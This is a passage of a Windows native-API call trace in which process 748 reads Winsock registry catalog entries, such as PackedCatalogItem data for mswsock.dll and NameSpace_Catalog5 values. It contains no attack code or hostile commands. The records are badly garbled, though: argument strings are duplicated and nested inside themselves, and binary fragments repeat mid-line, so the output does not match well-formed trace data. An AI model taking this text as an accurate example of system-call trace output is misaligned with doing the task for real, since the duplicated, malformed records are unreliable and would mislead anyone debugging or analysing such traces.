Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222 \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0\223\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\223\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\224\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\01\0\224\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\226\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00659   748   NtClose  (80, ... ) == 0x0
 00660   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000021"}, ... 80, ) }, ... 80, ) == 0x0
 00661   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00662   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00663   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222!\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0\230\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\230\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\231\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\02\0\231\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\233\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222!\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0\230\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\230\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\231\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\02\0\231\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\233\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\233\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222!\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0\230\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\230\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\231\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\02\0\231\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\232\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\233\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00664   748   NtClose  (80, ... ) == 0x0
 00665   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000022"}, ... 80, ) }, ... 80, ) == 0x0
 00666   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00667   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00668   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222"\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0\235\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\235\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\236\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0L\0\0\0\236\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\237\2\0\0\344\1\0\0\354\2\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0D\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\237\2\0\0\344\1\0\0\354\2\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0\240\2\0\0\344\1\0\0\354\2\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\240\2\0\0\344\1\0\0\354\2\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0L\0\0\0\241\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0@\0\0\0t\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0\250r\24\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222"\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0\235\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\235\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\236\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0L\0\0\0\236\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\237\2\0\0\344\1\0\0\354\2\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0D\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\237\2\0\0\344\1\0\0\354\2\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0\240\2\0\0\344\1\0\0\354\2\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\240\2\0\0\344\1\0\0\354\2\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0L\0\0\0\241\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0@\0\0\0t\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0\250r\24\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\371\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\02\01\0B\08\0E\09\0D\05\0-\03\0F\0C\03\0-\04\0F\09\0D\0-\08\0\0\0\0\0\204\3\0\0\235\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\235\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\236\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0L\0\0\0\236\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\237\2\0\0\344\1\0\0\354\2\0\0\305\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0D\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\237\2\0\0\344\1\0\0\354\2\0\0\305\0\0\0\1\0\1\0\2\1\0\0\0\0\0\0\240\2\0\0\344\1\0\0\354\2\0\0\25\0\0\0\0\0\1\0\0\0\0\0\24\0\0\0\3\0\37\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\240\2\0\0\344\1\0\0\354\2\0\0\25\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0L\0\0\0\241\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0T\0\0\0\0\0\0\2\0\0\0\0\30\0\0\0@\0\0\0t\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$\0&\0\250r\24\0\0\0\0\0N\0a\0m\0e\0S\0p\0a\0c\0e\0_\0C\0a\0t\0a\0l\0o\0g\05\0"}, 900, ) == 0x0
 00669   748   NtClose  (80, ... ) == 0x0
 00670   748   NtClose  (76, ... ) == 0x0
 00671   748   NtWaitForSingleObject  (68, 0, {0, 0}, ... ) == 0x102
 00672   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 76, ) == 0x0
 00673   748   NtOpenKey  (0x2000000, {24, 64, 0x40, 0, 0,  (0x2000000, {24, 64, 0x40, 0, 0, "NameSpace_Catalog5"}, ... 80, ) }, ... 80, ) == 0x0
 00674   748   NtQueryValueKey  (80,  (80, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (80, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) }, 16, ) == 0x0
 00675   748   NtNotifyChangeKey  (80, 76, 0, 0, 2011455960, 1, 0, 0, 0, 1, ... ) == 0x103
 00676   748   NtQueryValueKey  (80,  (80, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (80, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\5\0\0\0"}, 16, ) }, 16, ) == 0x0
 00677   748   NtOpenKey  (0x2000000, {24, 80, 0x40, 0, 0,  (0x2000000, {24, 80, 0x40, 0, 0, "00000005"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00678   748   NtQueryValueKey  (80,  (80, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (80, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\4\0\0\0"}, 16, ) }, 16, ) == 0x0
 00679   748   NtOpenKey  (0x2000000, {24, 80, 0x40, 0, 0,  (0x2000000, {24, 80, 0x40, 0, 0, "Catalog_Entries"}, ... 84, ) }, ... 84, ) == 0x0
 00680   748   NtOpenKey  (0x20019, {24, 84, 0x40, 0, 0,  (0x20019, {24, 84, 0x40, 0, 0, "000000000001"}, ... 88, ) }, ... 88, ) == 0x0
 00681   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 00682   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 00683   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 00684   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 00685   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 00686   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="T\0c\0p\0i\0p\0\0\0"}, 24, ) }, 24, ) == 0x0
 00687   748   NtQueryValueKey  (88,  (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="@\235\5"\236~\317\21\256Z\0\252\0\247\21+"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="@\235\5"\236~\317\21\256Z\0\252\0\247\21+"}, 28, ) \236~\317\21\256Z\0\252\0\247\21+"}, 28, ) == 0x0
 00688   748   NtQueryValueKey  (88,  (88, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00689   748   NtQueryValueKey  (88,  (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\14\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\14\0\0\0"}, 16, ) }, 16, ) == 0x0
 00690   748   NtQueryValueKey  (88,  (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00691   748   NtQueryValueKey  (88,  (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00692   748   NtQueryValueKey  (88,  (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00693   748   NtClose  (88, ... ) == 0x0
 00694   748   NtOpenKey  (0x20019, {24, 84, 0x40, 0, 0,  (0x20019, {24, 84, 0x40, 0, 0, "000000000002"}, ... 88, ) }, ... 88, ) == 0x0
